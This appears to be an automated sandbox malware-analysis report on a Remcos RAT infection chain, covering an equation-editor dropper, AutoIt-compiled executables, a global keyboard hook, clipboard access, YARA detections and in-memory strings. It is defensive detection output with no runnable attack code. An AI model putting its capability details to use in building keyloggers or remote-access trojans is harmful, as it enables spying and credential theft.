Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: svchost.exe, 00000016.00000002.769567756.000000000014C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/T
Source: svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://www.msn.com/
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: svchost.exe, 00000014.00000002.778795762.00000000001E3000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: chp8DDF.tmp.20.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: chp8DDF.tmp.20.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://contextual.media.net/
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: chp8DDF.tmp.20.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chp8DDF.tmp.20.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: bhvA8BE.tmp.20.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 17_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

17_2_0040A2B8

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\svchost.exe

Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0028EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

3_2_0028EAFF

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_0028ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	3_2_0028ED6A
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_010FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	16_2_010FED6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	17_2_004168C1

Source: C:\Users\user\AppData\Roaming\YED.exe

3_2_0028EAFF

Source: C:\Users\user\AppData\Roaming\YED.exe

Code function: 3_2_0027AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

3_2_0027AA57

Source: C:\Users\user\AppData\Roaming\YED.exe	Code function: 3_2_002A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		3_2_002A9576
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Code function: 16_2_01119576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		16_2_01119576

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE	Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Binary is likely a compiled AutoIt script file

Source: YED.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: YED.exe, 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_724e584b-d
Source: YED.exe, 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5ad92b34-6
Source: YED.exe, 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dc3c8c8e-f
Source: YED.exe, 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ba9b0a42-7
Source: Bactris.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Bactris.exe, 00000010.00000000.760231345.0000000001142000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_75d036b4-d
Source: Bactris.exe, 00000010.00000000.760231345.0000000001142000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_942574d1-6
Source: YED.exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c565d1f2-8
Source: YED.exe.2.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_32c3c399-9
Source: Bactris.exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8317b557-0
Source: Bactris.exe.3.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_f929ebf5-f

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Roaming\YED.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\YED.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YED.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
